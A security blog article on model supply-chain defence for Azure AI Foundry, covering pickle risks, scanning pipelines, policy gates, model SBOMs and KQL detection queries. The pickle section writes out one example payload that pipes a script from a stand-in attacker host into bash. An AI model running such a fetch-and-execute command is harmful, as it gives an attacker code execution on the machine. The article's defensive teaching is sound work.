Secure AI Supply Chain: Model Verification for Azure AI...

The Model That Called Home on First Load

A healthcare analytics team needed a specialized medical NLP model for their Azure AI Foundry RAG pipeline. A senior data scientist found a fine-tuned model on Hugging Face with strong benchmark scores, pulled it through the Foundry model catalog, and deployed it as a managed online endpoint. Within four hours, the endpoint's managed identity had enumerated every secret in the hub's connected Key Vault. The model's config.json contained a serialized pickle object in a custom callback that executed on model load, not during inference. The team's content filters, prompt shields, and rate limits were irrelevant because the attack happened before a single inference request was processed.

This is not a theoretical scenario. Researchers at JFrog, HiddenLayer, and Trail of Bits have documented hundreds of models on public registries containing malicious payloads embedded in pickle files, safetensors metadata, or custom tokenizer code. The Azure AI Foundry security guide covers the threat model at the platform level. This article is the operational playbook for the supply chain layer: how to verify, scan, gate, and monitor every model before it reaches your Foundry compute.

Why AI Model Supply Chains Are Different from Software Supply Chains

Software supply chain security has mature tooling: SBOMs, signed packages, provenance attestations (SLSA), and vulnerability databases (CVE/NVD). AI model supply chains have almost none of that infrastructure in production today.

The fundamental difference is the artifact format. A Python package is source code you can audit. A model weight file is a binary blob that contains learned parameters, but the serialization format can also contain executable code. Python's pickle module is the most notorious example: it deserializes arbitrary Python objects, which means loading a pickle file can execute arbitrary code. But pickle is not the only vector.

Attack Vectors in Model Artifacts

Vector	File Types	Execution Trigger	Detection Difficulty
Pickle deserialization	`.pkl`, `.pt`, `.bin`	Model load (`torch.load()`)	Medium: scanners exist
Custom tokenizer code	`tokenizer.py`, `__init__.py`	Tokenizer initialization	Low: visible in source
Safetensors metadata injection	`.safetensors`	Metadata parsing in custom loaders	High: often trusted as safe
ONNX custom operators	`.onnx`	Runtime operator registration	High: binary inspection needed
Notebook execution	`.ipynb` in model repo	Manual execution by data scientist	Low: but relies on human caution
Model card script injection	`README.md` with HTML/JS	Rendered in web UI	Medium: CSP should block

The safetensors format was created specifically to avoid pickle's code execution risk. It stores tensors as raw bytes with a JSON header and does not support arbitrary object serialization. However, some model loading pipelines read safetensors metadata and pass values to eval() or exec() in custom preprocessing code. The format is safe; the code around it might not be.

Model Provenance: Knowing What You Are Deploying

Provenance answers three questions: who created this model, what data was it trained on, and has it been modified since creation?

Hugging Face Model Cards and Signatures

Hugging Face introduced commit signing for model repositories in 2024. Models signed with GPG keys show a verified badge on the model card. In practice, fewer than 5% of community models are signed. Microsoft-published models in the Foundry catalog are signed, but models from the broader Hugging Face ecosystem that appear in Foundry's catalog are not necessarily verified.

Check signature status before pulling any model:

# Check if a model repo has signed commits
huggingface-cli repo info <org>/<model-name> --revision main# Verify GPG signature on a specific commit
git -C <local-model-dir> log --show-signature -1

Model Cards as Security Documentation

A model card should tell you:

Training data sources and any known biases
Fine-tuning methodology and hyperparameters
Intended use cases and out-of-scope applications
Known limitations and failure modes

From a security perspective, the critical field is the training data declaration. If a model was fine-tuned on data that includes your industry's regulated content (HIPAA, PCI, GDPR-scoped data), deploying it may create compliance obligations even if you did not supply the training data yourself.

Building an Internal Model Registry

The single most impactful control for AI supply chain security is never deploying directly from a public registry to production. Every model goes through an internal registry first.

# Create a dedicated Azure Container Registry for model artifacts
az acr create \
  --name prodmodelregistry \
  --resource-group rg-ai-platform \
  --sku Premium \
  --admin-enabled false \
  --public-network-enabled false# Import a verified model from Hugging Face to internal registry
# After scanning (see next section), push the model artifact
az acr import \
  --name prodmodelregistry \
  --source docker.io/library/model-artifact:v1.2.0 \
  --image verified-models/medical-nlp:v1.2.0-scanned

Tag every imported model with scan results metadata:

# Add scan metadata as OCI annotations
oras push prodmodelregistry.azurecr.io/verified-models/medical-nlp:v1.2.0-scanned \
  --annotation "security.scan.tool=modelscan" \
  --annotation "security.scan.result=clean" \
  --annotation "security.scan.date=2026-06-23" \
  --annotation "security.provenance.source=huggingface/medical-nlp-v1" \
  --annotation "security.provenance.signer=microsoft" \
  ./model-weights/

Automated Model Scanning Pipeline

Manual review does not scale. A production AI platform needs automated scanning at two gates: when a model enters the internal registry, and before it deploys to a Foundry endpoint.

Scanning Tools Comparison

Tool	What It Detects	Format Support	Integration
ModelScan (ProtectAI)	Pickle exploits, unsafe ops	PyTorch, TF, Keras, ONNX	CLI, Python API, CI/CD
Fickling (Trail of Bits)	Pickle opcode analysis	Pickle files only	CLI, Python API
NB Defense	Notebook credentials, PII	Jupyter notebooks	CLI, pre-commit hook
Safetensors Audit	Metadata injection patterns	Safetensors	Python script
Semgrep (custom rules)	Unsafe model loading patterns	Python source	CI/CD, IDE

ModelScan is the most comprehensive option for Azure deployments because it handles the formats Foundry actually uses: PyTorch checkpoints, ONNX exports, and TensorFlow SavedModels.

GitHub Actions Scanning Pipeline

name: Model Security Scan
on:
  push:
    paths:
<ul class="list-disc pl-6 mb-4 space-y-2">
<li class="text-gray-600 ml-6">'models/**'</li>
</ul>
  workflow_dispatch:
    inputs:
      model_path:
        description: 'Path to model artifact'
        required: truejobs:
  scan:
    runs-on: ubuntu-latest
    steps:
<ul class="list-disc pl-6 mb-4 space-y-2">
<li class="text-gray-600 ml-6">uses: actions/checkout@v4</li>
</ul>

name: Install scanning tools

run: | pip install modelscan fickling

<ul class="list-disc pl-6 mb-4 space-y-2">
<li class="text-gray-600 ml-6">name: Run ModelScan</li>
</ul>
        run: |
          modelscan scan -p ${{ inputs.model_path || 'models/' }} \
            --output-format json \
            --output-file scan-results.json

name: Run Fickling on pickle files

run: | find ${{ inputs.model_path || 'models/' }} \ -name "*.pkl" -o -name "*.pt" -o -name "*.bin" | \ while read f; do echo "Scanning: $f" fickling --check-safety "$f" done

<ul class="list-disc pl-6 mb-4 space-y-2">
<li class="text-gray-600 ml-6">name: Evaluate scan results</li>
</ul>
        run: |
          python3 -c "
          import json, sys
          results = json.load(open('scan-results.json'))
          issues = results.get('issues', [])
          critical = [i for i in issues if i['severity'] in ('CRITICAL', 'HIGH')]
          if critical:
              print(f'BLOCKED: {len(critical)} critical/high issues found')
              for i in critical:
                  print(f'  - {i["description"]} in {i["source"]}')
              sys.exit(1)
          print(f'PASSED: {len(issues)} low/info issues, 0 critical')
          "

name: Push to ACR if clean

if: success() run: | az acr login --name prodmodelregistry # Tag and push verified model ```

<h3 id="pickle-deserialization-the-specific-threat" class="text-xl font-bold mt-6 mb-3 text-gray-900">Pickle Deserialization: The Specific Threat</h3>
Python's pickle module uses opcodes to reconstruct objects. The <code class="bg-gray-200 text-gray-800 px-1.5 py-0.5 rounded text-sm font-mono">REDUCE</code> opcode calls a callable with arguments, which means a pickle file can encode <code class="bg-gray-200 text-gray-800 px-1.5 py-0.5 rounded text-sm font-mono">os.system("curl attacker.com/shell.sh | bash")</code> and it will execute when <code class="bg-gray-200 text-gray-800 px-1.5 py-0.5 rounded text-sm font-mono">pickle.load()</code> runs. PyTorch's <code class="bg-gray-200 text-gray-800 px-1.5 py-0.5 rounded text-sm font-mono">torch.load()</code> uses pickle by default.The defense is straightforward: never use <code class="bg-gray-200 text-gray-800 px-1.5 py-0.5 rounded text-sm font-mono">torch.load()</code> on untrusted files. Use <code class="bg-gray-200 text-gray-800 px-1.5 py-0.5 rounded text-sm font-mono">torch.load(weights_only=True)</code> (added in PyTorch 2.0) or convert to safetensors format before deployment.

python # UNSAFE: executes arbitrary code in pickle model = torch.load("untrusted_model.pt")

# SAFE: only loads tensor data, rejects arbitrary objects model = torch.load("untrusted_model.pt", weights_only=True)

# SAFEST: convert to safetensors format in quarantine environment from safetensors.torch import save_file, load_file

# In quarantine VM (isolated, no network, disposable) state_dict = torch.load("untrusted_model.pt", weights_only=True) save_file(state_dict, "verified_model.safetensors")

# In production pipeline model_weights = load_file("verified_model.safetensors")

<h2 id="azure-policy-gates-for-foundry-model-deployments" class="text-2xl font-bold mt-8 mb-4 text-gray-900">Azure Policy Gates for Foundry Model Deployments</h2>
Azure Policy is your enforcement layer. Scanning catches known threats; policy prevents unscanned models from deploying at all.
<h3 id="deny-untagged-model-deployments" class="text-xl font-bold mt-6 mb-3 text-gray-900">Deny Untagged Model Deployments</h3>Create a custom policy that requires model deployments to have a scan result annotation:

json { "mode": "All", "policyRule": { "if": { "allOf": [ { "field": "type", "equals": "Microsoft.MachineLearningServices/workspaces/onlineEndpoints/deployments" }, { "not": { "field": "tags['security.scan.result']", "equals": "clean" } } ] }, "then": { "effect": "deny" } }, "parameters": {} }

<h3 id="restrict-model-sources-to-internal-registry" class="text-xl font-bold mt-6 mb-3 text-gray-900">Restrict Model Sources to Internal Registry</h3>

bash # Assign policy to deny model deployments from external registries az policy assignment create \ --name 'require-internal-model-registry' \ --display-name 'Require models from internal ACR only' \ --policy '' \ --scope '/subscriptions//resourceGroups/rg-ai-platform' \ --params '{"allowedRegistries": {"value": ["prodmodelregistry.azurecr.io"]}}'

<h3 id="separate-hubs-for-experimentation-vs-production" class="text-xl font-bold mt-6 mb-3 text-gray-900">Separate Hubs for Experimentation vs. Production</h3>
The <a href="/blog/azure-ai-foundry-security-threat-model-rbac-governance" class="text-[#1D4ED8] underline hover:text-[#1E3A8A] font-medium">AI Foundry security guide</a> recommends hub separation. For supply chain security specifically, the pattern is:
<ol class="list-decimal pl-6 mb-4 space-y-2">
<li class="text-gray-600"><strong>Sandbox hub</strong>: data scientists can pull any model from the catalog. No production data access. Managed network set to <code class="bg-gray-200 text-gray-800 px-1.5 py-0.5 rounded text-sm font-mono">AllowInternetOutbound</code>. Models deployed here are for evaluation only.</li>
<li class="text-gray-600"><strong>Staging hub</strong>: only models from the internal ACR can be deployed. Automated scanning gate runs before import. Connected to staging data.</li>
<li class="text-gray-600"><strong>Production hub</strong>: <code class="bg-gray-200 text-gray-800 px-1.5 py-0.5 rounded text-sm font-mono">AllowOnlyApprovedOutbound</code> network isolation. Azure Policy denies any model deployment without scan tags. Connected to production data stores with Purview integration.</li>
</ol>
<h2 id="model-sbom-tracking-what-is-inside-your-models" class="text-2xl font-bold mt-8 mb-4 text-gray-900">Model SBOM: Tracking What Is Inside Your Models</h2>
Software Bill of Materials (SBOM) for models is an emerging practice. Unlike software SBOMs (which list packages and versions), a model SBOM documents:
<ul class="list-disc pl-6 mb-4 space-y-2">
<li class="text-gray-600">Base model architecture and version</li>
<li class="text-gray-600">Training dataset references (not the data itself)</li>
<li class="text-gray-600">Fine-tuning parameters and methodology</li>
<li class="text-gray-600">Dependencies required for inference (Python packages, CUDA version)</li>
<li class="text-gray-600">Serialization format and any custom operators</li>
</ul><h3 id="generating-a-model-sbom" class="text-xl font-bold mt-6 mb-3 text-gray-900">Generating a Model SBOM</h3>

python import json from datetime import datetime

def generate_model_sbom(model_name, model_path, base_model, training_info): sbom = { "sbomVersion": "1.0", "modelName": model_name, "generatedAt": datetime.utcnow().isoformat(), "provenance": { "baseModel": base_model, "source": training_info.get("source", "internal"), "commitHash": training_info.get("commit_hash"), "signatureVerified": training_info.get("signed", False), }, "artifacts": [], "dependencies": [], "securityMetadata": { "scanTool": "modelscan", "scanDate": None, "scanResult": None, "format": "safetensors", "picklePresent": False, } }

# Enumerate model files
import os
for root, dirs, files in os.walk(model_path):
    for f in files:
        fpath = os.path.join(root, f)
        sbom["artifacts"].append({
            "filename": f,
            "size": os.path.getsize(fpath),
            "sha256": compute_sha256(fpath),
            "format": f.split(".")[-1],
        })
        if f.endswith((".pkl", ".pt", ".bin")):
            sbom["securityMetadata"]["picklePresent"] = True

return sbom

Store the SBOM alongside the model artifact in your internal ACR. When a deployment is created in Foundry, your CI/CD pipeline can pull the SBOM and verify that the scan date is recent and the result is clean before proceeding.
<h2 id="runtime-monitoring-detecting-compromised-models-post-deployment" class="text-2xl font-bold mt-8 mb-4 text-gray-900">Runtime Monitoring: Detecting Compromised Models Post-Deployment</h2>
Even with pre-deployment scanning, runtime monitoring catches behaviors that static analysis misses: models that phone home during inference, models that leak training data through carefully crafted prompts, or models that behave differently after a specific number of requests.<h3 id="kql-anomalous-outbound-connections-from-foundry-compute" class="text-xl font-bold mt-6 mb-3 text-gray-900">KQL: Anomalous Outbound Connections from Foundry Compute</h3>

kusto AzureDiagnostics | where ResourceType == "WORKSPACES" | where Category == "ComputeInstanceEvent" or Category == "OnlineEndpointTraffic" | where properties_s contains "outbound" or properties_s contains "egress" | extend DestinationIP = extract("destinationAddress=([^,]+)", 1, properties_s) | where DestinationIP !startswith "10." and DestinationIP !startswith "172.16." | summarize ConnectionCount = count(), FirstSeen = min(TimeGenerated), LastSeen = max(TimeGenerated) by DestinationIP, ResourceId | where ConnectionCount > 10 | order by ConnectionCount desc

Alert on any outbound connection from a managed online endpoint to an IP address outside your known Azure service ranges. In <code class="bg-gray-200 text-gray-800 px-1.5 py-0.5 rounded text-sm font-mono">AllowOnlyApprovedOutbound</code> mode, these connections should be blocked, but the alert catches misconfigurations.

<h3 id="kql-model-deployment-from-non-approved-source" class="text-xl font-bold mt-6 mb-3 text-gray-900">KQL: Model Deployment from Non-Approved Source</h3>

kusto AzureActivity | where OperationNameValue == "Microsoft.MachineLearningServices/workspaces/onlineEndpoints/deployments/write" | where ActivityStatus == "Succeeded" | extend DeploymentDetails = parse_json(Properties) | extend ModelSource = tostring(DeploymentDetails.modelSource) | where ModelSource !contains "prodmodelregistry.azurecr.io" | project TimeGenerated, Caller, ResourceGroup, ModelSource, ResourceId | order by TimeGenerated desc

<h3 id="inference-payload-anomaly-detection" class="text-xl font-bold mt-6 mb-3 text-gray-900">Inference Payload Anomaly Detection</h3>Monitor for unusual inference patterns that indicate model probing or extraction attempts:

kusto // Detect potential model extraction: high volume structured queries from single identity AMLOnlineEndpointConsoleLog | where Message contains "request_id" | extend RequestCaller = extract("caller=([^,]+)", 1, Message) | summarize RequestCount = count(), AvgLatency = avg(DurationMs) by RequestCaller, bin(TimeGenerated, 1h) | where RequestCount > 500 | order by RequestCount desc

<h2 id="supply-chain-security-for-fine-tuned-models" class="text-2xl font-bold mt-8 mb-4 text-gray-900">Supply Chain Security for Fine-Tuned Models</h2>
Fine-tuning introduces a second supply chain risk: the training data. A model fine-tuned on poisoned data produces biased or manipulated outputs without any malicious code in the model files themselves. This is a data integrity attack, not a code execution attack, and it bypasses every scanning tool discussed above.
<h3 id="mitigations-for-training-data-integrity" class="text-xl font-bold mt-6 mb-3 text-gray-900">Mitigations for Training Data Integrity</h3>
<ul class="list-disc pl-6 mb-4 space-y-2">
<li class="text-gray-600">Store all training datasets in versioned blob storage with soft delete enabled</li>
<li class="text-gray-600">Require signed commits for any changes to training data repositories</li>
<li class="text-gray-600">Run automated data validation checks: schema validation, statistical distribution checks, and outlier detection before fine-tuning jobs</li>
<li class="text-gray-600">Log the exact dataset version (commit hash or blob snapshot ID) used for each fine-tuning run in the model SBOM</li>
<li class="text-gray-600">Use <a href="/blog/microsoft-purview-information-protection-setup-guide" class="text-[#1D4ED8] underline hover:text-[#1E3A8A] font-medium">Microsoft Purview</a> sensitivity labels on training data to enforce access controls</li>
</ul>
<h3 id="federated-credentials-for-ci-cd-model-pipelines" class="text-xl font-bold mt-6 mb-3 text-gray-900">Federated Credentials for CI/CD Model Pipelines</h3>Your model deployment pipeline should authenticate to Azure using <a href="/blog/flexible-federated-identity-credentials-entra-github-terraform" class="text-[#1D4ED8] underline hover:text-[#1E3A8A] font-medium">workload identity federation</a>, not stored secrets. A compromised secret in a CI/CD pipeline gives an attacker persistent access to deploy arbitrary models. Federated credentials are short-lived and scoped to the specific pipeline run.

bash # Create federated credential for GitHub Actions model deployment pipeline az ad app federated-credential create \ --id \ --parameters '{ "name": "model-deploy-pipeline", "issuer": "https://token.actions.githubusercontent.com", "subject": "repo:org/ai-models:environment:production", "audiences": ["api://AzureADTokenExchange"] }' ```

Integration with Defender for Cloud

Defender for Cloud provides AI workload protection that complements the supply chain controls in this guide. The coverage as of mid-2026:

Control	Defender for Cloud	Supply Chain Pipeline
Pickle exploit detection	No	Yes (ModelScan)
Anomalous inference volume	Yes	No (runtime only)
Model provenance verification	No	Yes (SBOM + signatures)
Prompt injection detection	Yes	No (not supply chain)
Unauthorized model deployment	Partial (activity alerts)	Yes (Azure Policy deny)
Training data integrity	No	Yes (versioning + Purview)
Container vulnerability in model endpoint	Yes	Partial (base image scan)

The two layers are complementary. Do not rely on Defender for Cloud alone for supply chain threats, and do not rely on your scanning pipeline alone for runtime threats.

Hardening Checklist

[ ] Internal model registry (ACR) deployed with private endpoint and admin access disabled
[ ] No direct deployments from public model catalogs to production hubs: Azure Policy enforced
[ ] ModelScan integrated into CI/CD pipeline scanning all model artifacts before registry push
[ ] Pickle files blocked or converted to safetensors format before entering internal registry
[ ] Model SBOM generated and stored alongside every model artifact in ACR
[ ] Hub separation enforced: sandbox (open catalog) / staging (internal ACR) / production (policy-gated)
[ ] Federated credentials used for all CI/CD model deployment pipelines: no stored secrets
[ ] Managed network isolation set to AllowOnlyApprovedOutbound on production hubs
[ ] KQL alerts deployed for non-approved model sources, anomalous outbound connections, and high-volume inference
[ ] Training data versioned with blob snapshots and Purview sensitivity labels applied
[ ] Model provenance (commit signatures) verified before any model enters the internal registry
[ ] Defender for Cloud AI workload protection enabled alongside the supply chain scanning pipeline

Frequently Asked Questions

Why is pickle deserialization dangerous for AI model files?

Python's pickle module reconstructs arbitrary Python objects from serialized bytes, including objects that execute code on instantiation. The REDUCE opcode in the pickle protocol calls any Python callable with supplied arguments, which means a pickle file can encode os.system("malicious command") and it executes the moment pickle.load() or torch.load() runs. Because PyTorch uses pickle by default for model checkpoints (.pt, .bin files), loading an untrusted model file is functionally equivalent to running an untrusted script. The mitigation is to use torch.load(weights_only=True) or convert all models to safetensors format, which stores only tensor data without code execution capability.

How does an internal model registry prevent supply chain attacks in Azure AI Foundry?

An internal Azure Container Registry acts as a trust boundary between public model sources and your production Foundry compute. Every model from the public Hugging Face catalog or Foundry model registry must first be pulled into a quarantine environment, scanned with tools like ModelScan for malicious payloads, converted to safe serialization formats, and tagged with scan metadata before being pushed to the internal ACR. Azure Policy on your production Foundry hub then denies any model deployment that does not originate from the internal registry or lacks clean scan tags. This two-gate approach (scan before registry entry, policy before deployment) ensures no unverified model reaches production compute.

What is a model SBOM and why does it matter for AI security?

A Model Software Bill of Materials documents the provenance and composition of a machine learning model: the base architecture, training data references, fine-tuning methodology, inference dependencies, serialization format, and security scan results. Unlike software SBOMs that track package dependencies, model SBOMs track the data and training lineage that determines model behavior. This matters for security because a model fine-tuned on poisoned data produces manipulated outputs without any detectable malicious code. The SBOM provides the audit trail needed to trace a model's outputs back to its training inputs when investigating incidents.

Can safetensors files contain malicious code?

The safetensors format itself cannot contain executable code because it stores only raw tensor bytes with a JSON metadata header. However, the loading code around safetensors files can introduce risk. If a custom model loading pipeline reads safetensors metadata and passes values to eval() or exec(), the metadata becomes an injection vector. The defense is twofold: use the standard safetensors library's load_file() function (which does not execute metadata), and audit any custom model loading code for unsafe deserialization patterns using Semgrep or similar static analysis tools.

Secure AI Supply Chain: Verifying Models Before Deploying to Azure AI Foundry

The Model That Called Home on First Load

Why AI Model Supply Chains Are Different from Software Supply Chains

Attack Vectors in Model Artifacts

Model Provenance: Knowing What You Are Deploying

Hugging Face Model Cards and Signatures

Model Cards as Security Documentation

Building an Internal Model Registry

Automated Model Scanning Pipeline

Scanning Tools Comparison

GitHub Actions Scanning Pipeline

Integration with Defender for Cloud

Hardening Checklist

Frequently Asked Questions

Why is pickle deserialization dangerous for AI model files?

How does an internal model registry prevent supply chain attacks in Azure AI Foundry?

What is a model SBOM and why does it matter for AI security?

Can safetensors files contain malicious code?

Get weekly security insights

AI Security Engineer Roadmap

Idan Ohayon

Share this article

Questions & Answers

Related Articles

What Is an AI Firewall? Runtime Protection for Enterprise AI in 2026

The Hidden Risk of AI Skills and MCP Servers: What to Check Before You Install

AI Security Mistakes You Are Probably Making Right Now

Need Help with Your Security?